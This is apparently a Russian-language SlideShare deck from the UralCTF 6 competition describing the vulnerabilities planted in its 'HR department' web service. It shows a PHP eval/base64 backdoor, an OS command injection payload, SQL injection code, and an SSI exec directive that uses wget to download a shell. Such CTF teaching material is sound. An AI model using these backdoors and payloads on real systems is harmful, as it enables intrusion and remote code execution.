Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
Отдел кадров Самый простой сервис  UralCTF 6
Стандартные пароли <ul><li>Меняйте все пароли, какие только возможно сменить! </li></ul><ul><li>Кроме того, хорошо бы удал...
Старый шелл код <ul><li>mysql.php: </li></ul><ul><li>@$_GET[‘code’]&& </li></ul><ul><li>eval(base64_decode($_GET[‘code’]))...
Инъекция ОС <ul><li>index.php: </li></ul><ul><li>$act=@$_GET['act']; </li></ul><ul><li>if(!$act)$act='index'; </li></ul><u...
Слепая  SQL  инъекция <ul><li>$ip= </li></ul><ul><li>@$_SERVER[‘ HTTP_ X_FORWARDED_FOR']? </li></ul><ul><li>$_SERVER[' HTT...
SQL  инъекция <ul><li>show.inc: </li></ul><ul><li>$sort=preg_replace('/UNION|SELECT| -- | |/*(.*)*//i','',$sort,E_STRICT);...
SSI <ul><li>LoadModule include_module modules/mod_include.so </li></ul><ul><li>Options +Includes </li></ul><ul><li>AddOutp...
??? <ul><li>//if($info['flag'])echo '<span style=&quot;display:none;)&quot;>'.$info['flag'].'</span>'; </li></ul><ul><li>$...
Ваши вопросы? Совсем нету?
Upcoming SlideShare
Loading in …5
×

1f5694b92ab2c96e2038b33a8b0ceb7d

199 views

Published on

  • Be the first to comment

1f5694b92ab2c96e2038b33a8b0ceb7d

  1. 1. Отдел кадров Самый простой сервис UralCTF 6
  2. 2. Стандартные пароли <ul><li>Меняйте все пароли, какие только возможно сменить! </li></ul><ul><li>Кроме того, хорошо бы удалить не нужные файлы, например phpinfo.php </li></ul>
  3. 3. Старый шелл код <ul><li>mysql.php: </li></ul><ul><li>@$_GET[‘code’]&& </li></ul><ul><li>eval(base64_decode($_GET[‘code’])); </li></ul><ul><li>print_r(mysql_fetch_array(mysql_query(…))) </li></ul>
  4. 4. Инъекция ОС <ul><li>index.php: </li></ul><ul><li>$act=@$_GET['act']; </li></ul><ul><li>if(!$act)$act='index'; </li></ul><ul><li>eval(`type {$act}.inc`); </li></ul><ul><li>?act=add.inc && echo+ ” phpinfo() ”&& cat+add </li></ul>
  5. 5. Слепая SQL инъекция <ul><li>$ip= </li></ul><ul><li>@$_SERVER[‘ HTTP_ X_FORWARDED_FOR']? </li></ul><ul><li>$_SERVER[' HTTP_ X_FORWARDED_FOR']: </li></ul><ul><li>$_SERVER['REMOTE_ADDR']; </li></ul><ul><li>INSERT INTO `log` (url,ip,time) </li></ul><ul><li>VALUES ('{$url}','{$ip}',NOW()) </li></ul>
  6. 6. SQL инъекция <ul><li>show.inc: </li></ul><ul><li>$sort=preg_replace('/UNION|SELECT| -- | |/*(.*)*//i','',$sort,E_STRICT); </li></ul><ul><li>$sql=&quot;HANDLER $mysql_table READ id $sort WHERE flag='' LIMIT 1&quot;; </li></ul>
  7. 7. SSI <ul><li>LoadModule include_module modules/mod_include.so </li></ul><ul><li>Options +Includes </li></ul><ul><li>AddOutputFilter INCLUDES .php </li></ul><ul><li><!--#exec cmd=&quot;ls - la &quot; --> </li></ul><ul><li><!--#exec cmd=“ wget http://.../shell.php &quot; --> </li></ul>
  8. 8. ??? <ul><li>//if($info['flag'])echo '<span style=&quot;display:none;)&quot;>'.$info['flag'].'</span>'; </li></ul><ul><li>$sort='LAST'; </li></ul><ul><li>// eval(`type {$act}.inc`); </li></ul>
  9. 9. Ваши вопросы? Совсем нету?

×